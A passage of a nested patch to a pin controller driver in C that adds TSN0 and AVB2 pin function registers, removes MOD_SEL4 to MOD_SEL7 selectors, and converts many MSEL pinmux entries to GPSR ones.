++#define IP1SR8_7_4	FM(SDA4)		FM(HTX2)		FM(CTS4_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR8_11_8	FM(SCL5)		FM(HRTS2_N)		FM(RTS4_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR8_15_12	FM(SDA5)		FM(SCIF_CLK2)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR8_19_16	F_(0, 0)		FM(HCTS2_N)		FM(TX4)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR8_23_20	F_(0, 0)		FM(HSCK2)		FM(RX4)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ #define PINMUX_GPSR	\
+ 						GPSR3_29											\
+@@ -542,6 +604,24 @@ FM(IP0SR3_23_20)	IP0SR3_23_20	FM(IP1SR3_23_20)	IP1SR3_23_20	FM(IP2SR3_23_20)	IP2
+ FM(IP0SR3_27_24)	IP0SR3_27_24	FM(IP1SR3_27_24)	IP1SR3_27_24	FM(IP2SR3_27_24)	IP2SR3_27_24						\
+ FM(IP0SR3_31_28)	IP0SR3_31_28	FM(IP1SR3_31_28)	IP1SR3_31_28	FM(IP2SR3_31_28)	IP2SR3_31_28						\
+ \
++FM(IP0SR4_3_0)		IP0SR4_3_0	FM(IP1SR4_3_0)		IP1SR4_3_0	FM(IP2SR4_3_0)		IP2SR4_3_0	FM(IP3SR4_3_0)		IP3SR4_3_0	\
++FM(IP0SR4_7_4)		IP0SR4_7_4	FM(IP1SR4_7_4)		IP1SR4_7_4	FM(IP2SR4_7_4)		IP2SR4_7_4	\
++FM(IP0SR4_11_8)		IP0SR4_11_8	FM(IP1SR4_11_8)		IP1SR4_11_8	FM(IP2SR4_11_8)		IP2SR4_11_8	\
++FM(IP0SR4_15_12)	IP0SR4_15_12	FM(IP1SR4_15_12)	IP1SR4_15_12	FM(IP2SR4_15_12)	IP2SR4_15_12	\
++FM(IP0SR4_19_16)	IP0SR4_19_16	FM(IP1SR4_19_16)	IP1SR4_19_16	FM(IP2SR4_19_16)	IP2SR4_19_16	\
++FM(IP0SR4_23_20)	IP0SR4_23_20	FM(IP1SR4_23_20)	IP1SR4_23_20	FM(IP2SR4_23_20)	IP2SR4_23_20	\
++FM(IP0SR4_27_24)	IP0SR4_27_24	FM(IP1SR4_27_24)	IP1SR4_27_24	FM(IP2SR4_27_24)	IP2SR4_27_24	\
++FM(IP0SR4_31_28)	IP0SR4_31_28	FM(IP1SR4_31_28)	IP1SR4_31_28	FM(IP2SR4_31_28)	IP2SR4_31_28	\
++\
++FM(IP0SR5_3_0)		IP0SR5_3_0	FM(IP1SR5_3_0)		IP1SR5_3_0	FM(IP2SR5_3_0)		IP2SR5_3_0	\
++FM(IP0SR5_7_4)		IP0SR5_7_4	FM(IP1SR5_7_4)		IP1SR5_7_4	FM(IP2SR5_7_4)		IP2SR5_7_4	\
++FM(IP0SR5_11_8)		IP0SR5_11_8	FM(IP1SR5_11_8)		IP1SR5_11_8	FM(IP2SR5_11_8)		IP2SR5_11_8	\
++FM(IP0SR5_15_12)	IP0SR5_15_12	FM(IP1SR5_15_12)	IP1SR5_15_12	FM(IP2SR5_15_12)	IP2SR5_15_12	\
++FM(IP0SR5_19_16)	IP0SR5_19_16	FM(IP1SR5_19_16)	IP1SR5_19_16	FM(IP2SR5_19_16)	IP2SR5_19_16	\
++FM(IP0SR5_23_20)	IP0SR5_23_20	FM(IP1SR5_23_20)	IP1SR5_23_20	\
++FM(IP0SR5_27_24)	IP0SR5_27_24	FM(IP1SR5_27_24)	IP1SR5_27_24	\
++FM(IP0SR5_31_28)	IP0SR5_31_28	FM(IP1SR5_31_28)	IP1SR5_31_28	\
++\
+ FM(IP0SR6_3_0)		IP0SR6_3_0	FM(IP1SR6_3_0)		IP1SR6_3_0	FM(IP2SR6_3_0)		IP2SR6_3_0	\
+ FM(IP0SR6_7_4)		IP0SR6_7_4	FM(IP1SR6_7_4)		IP1SR6_7_4	FM(IP2SR6_7_4)		IP2SR6_7_4	\
+ FM(IP0SR6_11_8)		IP0SR6_11_8	FM(IP1SR6_11_8)		IP1SR6_11_8	FM(IP2SR6_11_8)		IP2SR6_11_8	\
+@@ -569,54 +649,6 @@ FM(IP0SR8_23_20)	IP0SR8_23_20	FM(IP1SR8_23_20)	IP1SR8_23_20	\
+ FM(IP0SR8_27_24)	IP0SR8_27_24	\
+ FM(IP0SR8_31_28)	IP0SR8_31_28
+ 
+-/* MOD_SEL4 */			/* 0 */				/* 1 */
+-#define MOD_SEL4_19		FM(SEL_TSN0_TD2_0)		FM(SEL_TSN0_TD2_1)
+-#define MOD_SEL4_18		FM(SEL_TSN0_TD3_0)		FM(SEL_TSN0_TD3_1)
+-#define MOD_SEL4_15		FM(SEL_TSN0_TD0_0)		FM(SEL_TSN0_TD0_1)
+-#define MOD_SEL4_14		FM(SEL_TSN0_TD1_0)		FM(SEL_TSN0_TD1_1)
+-#define MOD_SEL4_12		FM(SEL_TSN0_TXC_0)		FM(SEL_TSN0_TXC_1)
+-#define MOD_SEL4_9		FM(SEL_TSN0_TX_CTL_0)		FM(SEL_TSN0_TX_CTL_1)
+-#define MOD_SEL4_8		FM(SEL_TSN0_AVTP_PPS0_0)	FM(SEL_TSN0_AVTP_PPS0_1)
+-#define MOD_SEL4_5		FM(SEL_TSN0_AVTP_MATCH_0)	FM(SEL_TSN0_AVTP_MATCH_1)
+-#define MOD_SEL4_2		FM(SEL_TSN0_AVTP_PPS1_0)	FM(SEL_TSN0_AVTP_PPS1_1)
+-#define MOD_SEL4_1		FM(SEL_TSN0_MDC_0)		FM(SEL_TSN0_MDC_1)
+-
+-/* MOD_SEL5 */			/* 0 */				/* 1 */
+-#define MOD_SEL5_19		FM(SEL_AVB2_TX_CTL_0)		FM(SEL_AVB2_TX_CTL_1)
+-#define MOD_SEL5_16		FM(SEL_AVB2_TXC_0)		FM(SEL_AVB2_TXC_1)
+-#define MOD_SEL5_15		FM(SEL_AVB2_TD0_0)		FM(SEL_AVB2_TD0_1)
+-#define MOD_SEL5_12		FM(SEL_AVB2_TD1_0)		FM(SEL_AVB2_TD1_1)
+-#define MOD_SEL5_11		FM(SEL_AVB2_TD2_0)		FM(SEL_AVB2_TD2_1)
+-#define MOD_SEL5_8		FM(SEL_AVB2_TD3_0)		FM(SEL_AVB2_TD3_1)
+-#define MOD_SEL5_6		FM(SEL_AVB2_MDC_0)		FM(SEL_AVB2_MDC_1)
+-#define MOD_SEL5_5		FM(SEL_AVB2_MAGIC_0)		FM(SEL_AVB2_MAGIC_1)
+-#define MOD_SEL5_2		FM(SEL_AVB2_AVTP_MATCH_0)	FM(SEL_AVB2_AVTP_MATCH_1)
+-#define MOD_SEL5_0		FM(SEL_AVB2_AVTP_PPS_0)		FM(SEL_AVB2_AVTP_PPS_1)
+-
+-/* MOD_SEL6 */			/* 0 */				/* 1 */
+-#define MOD_SEL6_18		FM(SEL_AVB1_TD3_0)		FM(SEL_AVB1_TD3_1)
+-#define MOD_SEL6_16		FM(SEL_AVB1_TD2_0)		FM(SEL_AVB1_TD2_1)
+-#define MOD_SEL6_13		FM(SEL_AVB1_TD0_0)		FM(SEL_AVB1_TD0_1)
+-#define MOD_SEL6_12		FM(SEL_AVB1_TD1_0)		FM(SEL_AVB1_TD1_1)
+-#define MOD_SEL6_10		FM(SEL_AVB1_AVTP_PPS_0)		FM(SEL_AVB1_AVTP_PPS_1)
+-#define MOD_SEL6_7		FM(SEL_AVB1_TX_CTL_0)		FM(SEL_AVB1_TX_CTL_1)
+-#define MOD_SEL6_6		FM(SEL_AVB1_TXC_0)		FM(SEL_AVB1_TXC_1)
+-#define MOD_SEL6_5		FM(SEL_AVB1_AVTP_MATCH_0)	FM(SEL_AVB1_AVTP_MATCH_1)
+-#define MOD_SEL6_2		FM(SEL_AVB1_MDC_0)		FM(SEL_AVB1_MDC_1)
+-#define MOD_SEL6_1		FM(SEL_AVB1_MAGIC_0)		FM(SEL_AVB1_MAGIC_1)
+-
+-/* MOD_SEL7 */			/* 0 */				/* 1 */
+-#define MOD_SEL7_16		FM(SEL_AVB0_TX_CTL_0)		FM(SEL_AVB0_TX_CTL_1)
+-#define MOD_SEL7_15		FM(SEL_AVB0_TXC_0)		FM(SEL_AVB0_TXC_1)
+-#define MOD_SEL7_13		FM(SEL_AVB0_MDC_0)		FM(SEL_AVB0_MDC_1)
+-#define MOD_SEL7_11		FM(SEL_AVB0_TD0_0)		FM(SEL_AVB0_TD0_1)
+-#define MOD_SEL7_10		FM(SEL_AVB0_MAGIC_0)		FM(SEL_AVB0_MAGIC_1)
+-#define MOD_SEL7_7		FM(SEL_AVB0_TD1_0)		FM(SEL_AVB0_TD1_1)
+-#define MOD_SEL7_6		FM(SEL_AVB0_TD2_0)		FM(SEL_AVB0_TD2_1)
+-#define MOD_SEL7_3		FM(SEL_AVB0_TD3_0)		FM(SEL_AVB0_TD3_1)
+-#define MOD_SEL7_2		FM(SEL_AVB0_AVTP_MATCH_0)	FM(SEL_AVB0_AVTP_MATCH_1)
+-#define MOD_SEL7_0		FM(SEL_AVB0_AVTP_PPS_0)		FM(SEL_AVB0_AVTP_PPS_1)
+-
+ /* MOD_SEL8 */			/* 0 */				/* 1 */
+ #define MOD_SEL8_11		FM(SEL_SDA5_0)			FM(SEL_SDA5_1)
+ #define MOD_SEL8_10		FM(SEL_SCL5_0)			FM(SEL_SCL5_1)
+@@ -633,26 +665,18 @@ FM(IP0SR8_31_28)	IP0SR8_31_28
+ 
+ #define PINMUX_MOD_SELS \
+ \
+-MOD_SEL4_19		MOD_SEL5_19										\
+-MOD_SEL4_18					MOD_SEL6_18							\
+-														\
+-			MOD_SEL5_16		MOD_SEL6_16		MOD_SEL7_16				\
+-MOD_SEL4_15		MOD_SEL5_15					MOD_SEL7_15				\
+-MOD_SEL4_14													\
+-						MOD_SEL6_13		MOD_SEL7_13				\
+-MOD_SEL4_12		MOD_SEL5_12		MOD_SEL6_12							\
+-			MOD_SEL5_11					MOD_SEL7_11		MOD_SEL8_11	\
+-						MOD_SEL6_10		MOD_SEL7_10		MOD_SEL8_10	\
+-MOD_SEL4_9											MOD_SEL8_9	\
+-MOD_SEL4_8		MOD_SEL5_8								MOD_SEL8_8	\
+-						MOD_SEL6_7		MOD_SEL7_7		MOD_SEL8_7	\
+-			MOD_SEL5_6		MOD_SEL6_6		MOD_SEL7_6		MOD_SEL8_6	\
+-MOD_SEL4_5		MOD_SEL5_5		MOD_SEL6_5					MOD_SEL8_5	\
+-												MOD_SEL8_4	\
+-									MOD_SEL7_3		MOD_SEL8_3	\
+-MOD_SEL4_2		MOD_SEL5_2		MOD_SEL6_2		MOD_SEL7_2		MOD_SEL8_2	\
+-MOD_SEL4_1					MOD_SEL6_1					MOD_SEL8_1	\
+-			MOD_SEL5_0					MOD_SEL7_0		MOD_SEL8_0
++MOD_SEL8_11	\
++MOD_SEL8_10	\
++MOD_SEL8_9	\
++MOD_SEL8_8	\
++MOD_SEL8_7	\
++MOD_SEL8_6	\
++MOD_SEL8_5	\
++MOD_SEL8_4	\
++MOD_SEL8_3	\
++MOD_SEL8_2	\
++MOD_SEL8_1	\
++MOD_SEL8_0
+ 
+ enum {
+ 	PINMUX_RESERVED = 0,
+@@ -686,61 +710,8 @@ enum {
+ static const u16 pinmux_data[] = {
+ 	PINMUX_DATA_GP_ALL(),
+ 
+-	PINMUX_SINGLE(AVS1),
+-	PINMUX_SINGLE(AVS0),
+-	PINMUX_SINGLE(PCIE1_CLKREQ_N),
+-	PINMUX_SINGLE(PCIE0_CLKREQ_N),
+-
+-	/* TSN0 without MODSEL4 */
+-	PINMUX_SINGLE(TSN0_TXCREFCLK),
+-	PINMUX_SINGLE(TSN0_RD2),
+-	PINMUX_SINGLE(TSN0_RD3),
+-	PINMUX_SINGLE(TSN0_RD1),
+-	PINMUX_SINGLE(TSN0_RXC),
+-	PINMUX_SINGLE(TSN0_RD0),
+-	PINMUX_SINGLE(TSN0_RX_CTL),
+-	PINMUX_SINGLE(TSN0_AVTP_CAPTURE),
+-	PINMUX_SINGLE(TSN0_LINK),
+-	PINMUX_SINGLE(TSN0_PHY_INT),
+-	PINMUX_SINGLE(TSN0_MDIO),
+-	/* TSN0 with MODSEL4 */
+-	PINMUX_IPSR_NOGM(0, TSN0_TD2,		SEL_TSN0_TD2_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_TD3,		SEL_TSN0_TD3_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_TD0,		SEL_TSN0_TD0_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_TD1,		SEL_TSN0_TD1_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_TXC,		SEL_TSN0_TXC_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_TX_CTL,	SEL_TSN0_TX_CTL_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_AVTP_PPS0,	SEL_TSN0_AVTP_PPS0_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_AVTP_MATCH,	SEL_TSN0_AVTP_MATCH_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_AVTP_PPS1,	SEL_TSN0_AVTP_PPS1_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_MDC,		SEL_TSN0_MDC_1),
+-
+-	/* TSN0 without MODSEL5 */
+-	PINMUX_SINGLE(AVB2_RX_CTL),
+-	PINMUX_SINGLE(AVB2_RXC),
+-	PINMUX_SINGLE(AVB2_RD0),
+-	PINMUX_SINGLE(AVB2_RD1),
+-	PINMUX_SINGLE(AVB2_RD2),
+-	PINMUX_SINGLE(AVB2_MDIO),
+-	PINMUX_SINGLE(AVB2_RD3),
+-	PINMUX_SINGLE(AVB2_TXCREFCLK),
+-	PINMUX_SINGLE(AVB2_PHY_INT),
+-	PINMUX_SINGLE(AVB2_LINK),
+-	PINMUX_SINGLE(AVB2_AVTP_CAPTURE),
+-	/* TSN0 with MODSEL5 */
+-	PINMUX_IPSR_NOGM(0, AVB2_TX_CTL,	SEL_AVB2_TX_CTL_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_TXC,		SEL_AVB2_TXC_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_TD0,		SEL_AVB2_TD0_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_TD1,		SEL_AVB2_TD1_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_TD2,		SEL_AVB2_TD2_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_TD3,		SEL_AVB2_TD3_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_MDC,		SEL_AVB2_MDC_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_MAGIC,		SEL_AVB2_MAGIC_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_AVTP_MATCH,	SEL_AVB2_AVTP_MATCH_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_AVTP_PPS,	SEL_AVB2_AVTP_PPS_1),
+-
+ 	/* IP0SR0 */
+-	PINMUX_IPSR_GPSR(IP0SR0_3_0,	ERROROUTC_B),
++	PINMUX_IPSR_GPSR(IP0SR0_3_0,	ERROROUTC_N_B),
+ 	PINMUX_IPSR_GPSR(IP0SR0_3_0,	TCLK2_A),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR0_7_4,	MSIOF3_SS1),
+@@ -1006,7 +977,7 @@ static const u16 pinmux_data[] = {
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR3_27_24,	IPC_CLKOUT),
+ 	PINMUX_IPSR_GPSR(IP1SR3_27_24,	IPC_CLKEN_OUT),
+-	PINMUX_IPSR_GPSR(IP1SR3_27_24,	ERROROUTC_A),
++	PINMUX_IPSR_GPSR(IP1SR3_27_24,	ERROROUTC_N_A),
+ 	PINMUX_IPSR_GPSR(IP1SR3_27_24,	TCLK4_X),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR3_31_28,	QSPI0_SSL),
+@@ -1029,26 +1000,86 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_IPSR_GPSR(IP3SR3_19_16,	RPC_WP_N),
+ 	PINMUX_IPSR_GPSR(IP3SR3_23_20,	RPC_INT_N),
+ 
++	/* IP0SR4 */
++	PINMUX_IPSR_GPSR(IP0SR4_3_0,	TSN0_MDIO),
++	PINMUX_IPSR_GPSR(IP0SR4_7_4,	TSN0_MDC),
++	PINMUX_IPSR_GPSR(IP0SR4_11_8,	TSN0_AVTP_PPS1),
++	PINMUX_IPSR_GPSR(IP0SR4_15_12,	TSN0_PHY_INT),
++	PINMUX_IPSR_GPSR(IP0SR4_19_16,	TSN0_LINK),
++	PINMUX_IPSR_GPSR(IP0SR4_23_20,	TSN0_AVTP_MATCH),
++	PINMUX_IPSR_GPSR(IP0SR4_27_24,	TSN0_AVTP_CAPTURE),
++	PINMUX_IPSR_GPSR(IP0SR4_31_28,	TSN0_RX_CTL),
++
++	/* IP1SR4 */
++	PINMUX_IPSR_GPSR(IP1SR4_3_0,	TSN0_AVTP_PPS0),
++	PINMUX_IPSR_GPSR(IP1SR4_7_4,	TSN0_TX_CTL),
++	PINMUX_IPSR_GPSR(IP1SR4_11_8,	TSN0_RD0),
++	PINMUX_IPSR_GPSR(IP1SR4_15_12,	TSN0_RXC),
++	PINMUX_IPSR_GPSR(IP1SR4_19_16,	TSN0_TXC),
++	PINMUX_IPSR_GPSR(IP1SR4_23_20,	TSN0_RD1),
++	PINMUX_IPSR_GPSR(IP1SR4_27_24,	TSN0_TD1),
++	PINMUX_IPSR_GPSR(IP1SR4_31_28,	TSN0_TD0),
++
++	/* IP2SR4 */
++	PINMUX_IPSR_GPSR(IP2SR4_3_0,	TSN0_RD3),
++	PINMUX_IPSR_GPSR(IP2SR4_7_4,	TSN0_RD2),
++	PINMUX_IPSR_GPSR(IP2SR4_11_8,	TSN0_TD3),
++	PINMUX_IPSR_GPSR(IP2SR4_15_12,	TSN0_TD2),
++	PINMUX_IPSR_GPSR(IP2SR4_19_16,	TSN0_TXCREFCLK),
++	PINMUX_IPSR_GPSR(IP2SR4_23_20,	PCIE0_CLKREQ_N),
++	PINMUX_IPSR_GPSR(IP2SR4_27_24,	PCIE1_CLKREQ_N),
++	PINMUX_IPSR_GPSR(IP2SR4_31_28,	AVS0),
++
++	/* IP3SR4 */
++	PINMUX_IPSR_GPSR(IP3SR4_3_0,	AVS1),
++
++	/* IP0SR5 */
++	PINMUX_IPSR_GPSR(IP0SR5_3_0,	AVB2_AVTP_PPS),
++	PINMUX_IPSR_GPSR(IP0SR5_7_4,	AVB2_AVTP_CAPTURE),
++	PINMUX_IPSR_GPSR(IP0SR5_11_8,	AVB2_AVTP_MATCH),
++	PINMUX_IPSR_GPSR(IP0SR5_15_12,	AVB2_LINK),
++	PINMUX_IPSR_GPSR(IP0SR5_19_16,	AVB2_PHY_INT),
++	PINMUX_IPSR_GPSR(IP0SR5_23_20,	AVB2_MAGIC),
++	PINMUX_IPSR_GPSR(IP0SR5_27_24,	AVB2_MDC),
++	PINMUX_IPSR_GPSR(IP0SR5_31_28,	AVB2_TXCREFCLK),
++
++	/* IP1SR5 */
++	PINMUX_IPSR_GPSR(IP1SR5_3_0,	AVB2_TD3),
++	PINMUX_IPSR_GPSR(IP1SR5_7_4,	AVB2_RD3),
++	PINMUX_IPSR_GPSR(IP1SR5_11_8,	AVB2_MDIO),
++	PINMUX_IPSR_GPSR(IP1SR5_15_12,	AVB2_TD2),
++	PINMUX_IPSR_GPSR(IP1SR5_19_16,	AVB2_TD1),
++	PINMUX_IPSR_GPSR(IP1SR5_23_20,	AVB2_RD2),
++	PINMUX_IPSR_GPSR(IP1SR5_27_24,	AVB2_RD1),
++	PINMUX_IPSR_GPSR(IP1SR5_31_28,	AVB2_TD0),
++
++	/* IP2SR5 */
++	PINMUX_IPSR_GPSR(IP2SR5_3_0,	AVB2_TXC),
++	PINMUX_IPSR_GPSR(IP2SR5_7_4,	AVB2_RD0),
++	PINMUX_IPSR_GPSR(IP2SR5_11_8,	AVB2_RXC),
++	PINMUX_IPSR_GPSR(IP2SR5_15_12,	AVB2_TX_CTL),
++	PINMUX_IPSR_GPSR(IP2SR5_19_16,	AVB2_RX_CTL),
++
+ 	/* IP0SR6 */
+ 	PINMUX_IPSR_GPSR(IP0SR6_3_0,	AVB1_MDIO),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR6_7_4,	AVB1_MAGIC,		SEL_AVB1_MAGIC_1),
++	PINMUX_IPSR_GPSR(IP0SR6_7_4,	AVB1_MAGIC),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR6_11_8,	AVB1_MDC,		SEL_AVB1_MDC_1),
++	PINMUX_IPSR_GPSR(IP0SR6_11_8,	AVB1_MDC),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR6_15_12,	AVB1_PHY_INT),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR6_19_16,	AVB1_LINK),
+ 	PINMUX_IPSR_GPSR(IP0SR6_19_16,	AVB1_MII_TX_ER),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR6_23_20,	AVB1_AVTP_MATCH,	SEL_AVB1_AVTP_MATCH_1),
+-	PINMUX_IPSR_MSEL(IP0SR6_23_20,	AVB1_MII_RX_ER,		SEL_AVB1_AVTP_MATCH_0),
++	PINMUX_IPSR_GPSR(IP0SR6_23_20,	AVB1_AVTP_MATCH),
++	PINMUX_IPSR_GPSR(IP0SR6_23_20,	AVB1_MII_RX_ER),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR6_27_24,	AVB1_TXC,		SEL_AVB1_TXC_1),
+-	PINMUX_IPSR_MSEL(IP0SR6_27_24,	AVB1_MII_TXC,		SEL_AVB1_TXC_0),
++	PINMUX_IPSR_GPSR(IP0SR6_27_24,	AVB1_TXC),
++	PINMUX_IPSR_GPSR(IP0SR6_27_24,	AVB1_MII_TXC),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR6_31_28,	AVB1_TX_CTL,		SEL_AVB1_TX_CTL_1),
+-	PINMUX_IPSR_MSEL(IP0SR6_31_28,	AVB1_MII_TX_EN,		SEL_AVB1_TX_CTL_0),
++	PINMUX_IPSR_GPSR(IP0SR6_31_28,	AVB1_TX_CTL),
++	PINMUX_IPSR_GPSR(IP0SR6_31_28,	AVB1_MII_TX_EN),
+ 
+ 	/* IP1SR6 */
+ 	PINMUX_IPSR_GPSR(IP1SR6_3_0,	AVB1_RXC),
+@@ -1057,17 +1088,17 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_IPSR_GPSR(IP1SR6_7_4,	AVB1_RX_CTL),
+ 	PINMUX_IPSR_GPSR(IP1SR6_7_4,	AVB1_MII_RX_DV),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR6_11_8,	AVB1_AVTP_PPS,		SEL_AVB1_AVTP_PPS_1),
+-	PINMUX_IPSR_MSEL(IP1SR6_11_8,	AVB1_MII_COL,		SEL_AVB1_AVTP_PPS_0),
++	PINMUX_IPSR_GPSR(IP1SR6_11_8,	AVB1_AVTP_PPS),
++	PINMUX_IPSR_GPSR(IP1SR6_11_8,	AVB1_MII_COL),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR6_15_12,	AVB1_AVTP_CAPTURE),
+ 	PINMUX_IPSR_GPSR(IP1SR6_15_12,	AVB1_MII_CRS),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR6_19_16,	AVB1_TD1,		SEL_AVB1_TD1_1),
+-	PINMUX_IPSR_MSEL(IP1SR6_19_16,	AVB1_MII_TD1,		SEL_AVB1_TD1_0),
++	PINMUX_IPSR_GPSR(IP1SR6_19_16,	AVB1_TD1),
++	PINMUX_IPSR_GPSR(IP1SR6_19_16,	AVB1_MII_TD1),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR6_23_20,	AVB1_TD0,		SEL_AVB1_TD0_1),
+-	PINMUX_IPSR_MSEL(IP1SR6_23_20,	AVB1_MII_TD0,		SEL_AVB1_TD0_0),
++	PINMUX_IPSR_GPSR(IP1SR6_23_20,	AVB1_TD0),
++	PINMUX_IPSR_GPSR(IP1SR6_23_20,	AVB1_MII_TD0),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR6_27_24,	AVB1_RD1),
+ 	PINMUX_IPSR_GPSR(IP1SR6_27_24,	AVB1_MII_RD1),
+@@ -1076,14 +1107,14 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_IPSR_GPSR(IP1SR6_31_28,	AVB1_MII_RD0),
+ 
+ 	/* IP2SR6 */
+-	PINMUX_IPSR_MSEL(IP2SR6_3_0,	AVB1_TD2,		SEL_AVB1_TD2_1),
+-	PINMUX_IPSR_MSEL(IP2SR6_3_0,	AVB1_MII_TD2,		SEL_AVB1_TD2_0),
++	PINMUX_IPSR_GPSR(IP2SR6_3_0,	AVB1_TD2),
++	PINMUX_IPSR_GPSR(IP2SR6_3_0,	AVB1_MII_TD2),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR6_7_4,	AVB1_RD2),
+ 	PINMUX_IPSR_GPSR(IP2SR6_7_4,	AVB1_MII_RD2),
+ 
+-	PINMUX_IPSR_MSEL(IP2SR6_11_8,	AVB1_TD3,		SEL_AVB1_TD3_1),
+-	PINMUX_IPSR_MSEL(IP2SR6_11_8,	AVB1_MII_TD3,		SEL_AVB1_TD3_0),
++	PINMUX_IPSR_GPSR(IP2SR6_11_8,	AVB1_TD3),
++	PINMUX_IPSR_GPSR(IP2SR6_11_8,	AVB1_MII_TD3),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR6_15_12,	AVB1_RD3),
+ 	PINMUX_IPSR_GPSR(IP2SR6_15_12,	AVB1_MII_RD3),
+@@ -1091,29 +1122,29 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_IPSR_GPSR(IP2SR6_19_16,	AVB1_TXCREFCLK),
+ 
+ 	/* IP0SR7 */
+-	PINMUX_IPSR_MSEL(IP0SR7_3_0,	AVB0_AVTP_PPS,		SEL_AVB0_AVTP_PPS_1),
+-	PINMUX_IPSR_MSEL(IP0SR7_3_0,	AVB0_MII_COL,		SEL_AVB0_AVTP_PPS_0),
++	PINMUX_IPSR_GPSR(IP0SR7_3_0,	AVB0_AVTP_PPS),
++	PINMUX_IPSR_GPSR(IP0SR7_3_0,	AVB0_MII_COL),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR7_7_4,	AVB0_AVTP_CAPTURE),
+ 	PINMUX_IPSR_GPSR(IP0SR7_7_4,	AVB0_MII_CRS),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR7_11_8,	AVB0_AVTP_MATCH,	SEL_AVB0_AVTP_MATCH_1),
+-	PINMUX_IPSR_MSEL(IP0SR7_11_8,	AVB0_MII_RX_ER,		SEL_AVB0_AVTP_MATCH_0),
+-	PINMUX_IPSR_MSEL(IP0SR7_11_8,	CC5_OSCOUT,		SEL_AVB0_AVTP_MATCH_0),
++	PINMUX_IPSR_GPSR(IP0SR7_11_8,	AVB0_AVTP_MATCH),
++	PINMUX_IPSR_GPSR(IP0SR7_11_8,	AVB0_MII_RX_ER),
++	PINMUX_IPSR_GPSR(IP0SR7_11_8,	CC5_OSCOUT),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR7_15_12,	AVB0_TD3,		SEL_AVB0_TD3_1),
+-	PINMUX_IPSR_MSEL(IP0SR7_15_12,	AVB0_MII_TD3,		SEL_AVB0_TD3_0),
++	PINMUX_IPSR_GPSR(IP0SR7_15_12,	AVB0_TD3),
++	PINMUX_IPSR_GPSR(IP0SR7_15_12,	AVB0_MII_TD3),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR7_19_16,	AVB0_LINK),
+ 	PINMUX_IPSR_GPSR(IP0SR7_19_16,	AVB0_MII_TX_ER),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR7_23_20,	AVB0_PHY_INT),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR7_27_24,	AVB0_TD2,		SEL_AVB0_TD2_1),
+-	PINMUX_IPSR_MSEL(IP0SR7_27_24,	AVB0_MII_TD2,		SEL_AVB0_TD2_0),
++	PINMUX_IPSR_GPSR(IP0SR7_27_24,	AVB0_TD2),
++	PINMUX_IPSR_GPSR(IP0SR7_27_24,	AVB0_MII_TD2),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR7_31_28,	AVB0_TD1,		SEL_AVB0_TD1_1),
+-	PINMUX_IPSR_MSEL(IP0SR7_31_28,	AVB0_MII_TD1,		SEL_AVB0_TD1_0),
++	PINMUX_IPSR_GPSR(IP0SR7_31_28,	AVB0_TD1),
++	PINMUX_IPSR_GPSR(IP0SR7_31_28,	AVB0_MII_TD1),
+ 
+ 	/* IP1SR7 */
+ 	PINMUX_IPSR_GPSR(IP1SR7_3_0,	AVB0_RD3),
+@@ -1121,24 +1152,24 @@ static const u16 pinmux_data[] = {
+ 
